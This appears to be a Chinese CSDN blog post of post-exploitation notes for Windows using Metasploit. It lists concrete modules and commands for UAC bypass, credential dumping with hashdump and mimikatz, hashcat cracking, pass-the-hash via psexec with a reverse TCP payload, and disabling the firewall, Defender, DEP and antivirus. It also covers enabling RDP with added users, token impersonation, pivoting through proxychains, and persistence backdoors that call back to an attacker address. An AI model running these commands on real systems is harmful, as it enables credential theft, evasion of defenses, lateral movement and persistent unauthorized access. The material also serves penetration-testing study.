后渗透流程

权限提升

绕过UAC

msf模块

Exploit/windows/local/bypassuac
Exploit/windows/local/bypassuac_injection
Exploit/windows/local/bypassuac_vbs

系统提权

提高程序运行级别

msf模块（Exploit/windows/local/ask）
缺点：需要uac交互

后渗透信息收集

msf模块（post）

获取目标主机的分区情况：post/windows/gather/forensics/enum_drives
判断是否为虚拟机：
post/windows/gather/checkvm
开启了哪些服务：
post/windows/gather/enum_applications
查看共享：
post/windows/gather/enum_shares
获取主机最近的系统操作：
post/windows/gather/dumplinks
查看补丁：
post/windows/gather/enum_applicationsenum_patches
scraper脚本
路径：/usr/share/metasploit-framework/scripts/meterpreter

(meterpreter下run scraper)
保存信息的目录：/root/.msf4/logs/scripts/scraper/192.xxx.xx.xx.xx

winenum脚本(meterpreter下run winenum)

数据包抓获

目的：抓获与外围的交互
使用地点：找不到进入内网的方法（主机在防火墙，开放端口少，是服务器的子网）

抓包

sniffer会过滤掉自身merterpreter产生的流量，直接去抓取和主机相关的数据包信息

加载sniffer:load sniffer
查看网卡信息；sniffer_interfaces
开启监听：sniffer_start 1
导出数据包：sniffer_dump 1 1.cap

解包

auxiliary/sniffer/psnuffle

meterpreter模块

run packetrecorder
run post/windows/manage/rpcapd_start

抓hash

基础：密码格式：
用户名称：RID：LM-HASH值：NT-HASH值
###获取hash值

hashdump
run post/windows/gather/smart_hashdump
- 检查权限和系统类型
- 检查是否是域控制服务器
- 从注册表读取hash,注入lsass进程
- 如果是08server并且具有管理员权限，直接getsystem尝试提权
- 如果是win7且UAC关闭并具有管理员权限，从注册表读取
- 03/XP直接getsystem,从注册表读取hash
mimikatz(已集合到mimikatz)
- 需要administrator及以上权限，需要免杀
- privilege::debug #查看权限
- sekurlsa::logonpasswords #获取hash和明文密码（如果可以的话）
- sekurlsa::ekeys #获取kerberos加密凭证

hash破解

Hashcat

文章：
（https://www.anquanke.com/post/id/177123）

hashcat64.exe -m 1000 A1E33A2281B8C6DBC2373BFF87E8CB6E example.dict -o out.txt —force

hash传递攻击

UAC注册表：
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Policies/System

进shell，中文乱码，输入chcp 65001
shell改注册表uac为0reg.exe ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

MSF
exploit/windows/smb/psexec

use exploit/windows/smb/psexec
set payload windows/meterpreter/reverse_tcp set LHOST 192.168.206.128
set RHOST 192.168.206.101
set SMBUser administrator
set SMBPass AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C0 89C0
exploit

mimikkatz
sekurlsa::pth /user:Administrator /domain:WIN-RRI9T9SN85D /ntlm:31d6cfe0d16ae931b73c59d7e0c089c0

关闭防火墙及杀毒软件

-关闭防火墙(shell)
- Netsh advfirewall set allprofiles state off(管理员及以上权限)

关闭Denfender(shell)
- Net stop windefend
关闭DEP(shell)
- Bcdedit.exe /set {current} nx AlwaysOff
关闭杀毒软件(meterpreter)
- Run killav
- Run post/windows/manage/killava

远程桌面

开启远程桌面
- run post/windows/manage/enable_rdp（方式一）
- run getgui -e （方式二）

run multi_console__command -r /root/.msf4/loot/20191206223922_default_192.168.85.157_host.windows.cle_974816.txt
(关闭远程桌面)

开启远程桌面并添加新用户
- run getgui -u root -p pass

开启远程桌面并绑定在8888端口

- `run getgui -e -f 8888`

截图
- load espia
- screengrab
远程桌面连接
kali下：rdesktop -u root -p 123 192.168.85.157

令牌假冒

windows安全相关概念
- session
- Windows Station
- Desktop
- Login Session:不同账号登陆产生不同的登陆Session,代表不同的账号权限
incognito
- load incognito
- list_tokens -u
  (非交互的token多出来一条EA\Administrator)
- impersonate_token EA\Administrator
- 成功登陆

跳板攻击

pivoting
- 利用已经被入侵的主机作为跳板来攻击网络中其他系统
- 访问由于路由问题而不能直接访问的内网系统
添加路由
- 方式一：run autoroute -s 192.168.102.0/24
- 方式二：run post/multi/manage/autoroute(更新)
- 利用win7攻击内网服务器
- 扫描内网网络
  - run post/windows/gather/arp_scanner rhosts=192.168.102.0/24
  - use auxiliary/scanner/portscan/tcp

ProxyChains代理设置

配置：vim /etc/proxychain.conf(加上ip)
Socket代理
- auxiliary/server/socks4a
ProxyChains
- ProxyChains是为GUN\Linux操作系统而开发的工具，任何TCP连接都可以通过TOP或者SCOKS4,SCOKS5,HTTP/HTTPS路由到目的地。在这个通道技术中可以使用多个代理服务器。除此之外提供匿名方式，诸如用于中转跳板的应用程序也可以用于中转跳板的应用程序也可以用于对发现的新网络进行直接通信。
- proxychains nmap -sT -sV -Pn -n -p 22,80,135,139,445 --script=smb-vuln-ms08-067.nse 192.168.xx.xxx

后门植入

meterpreter后门： Metsvc
- 通过服务启动
- run metsvc -A #设定端口，上传后门文件
meterpreter后门：persistence
- 通过启动型启动
- 特性：定期会连，系统启动时回连，自动运行
- run persistence -A -S -U -i 60 -p 4321 -r 192.168.101.111

来源：CSDN

作者：FFM-G

链接：https://blog.csdn.net/weixin_44255856/article/details/103464504

标签

post

注册表

sniffer

shell

meterpreter

hash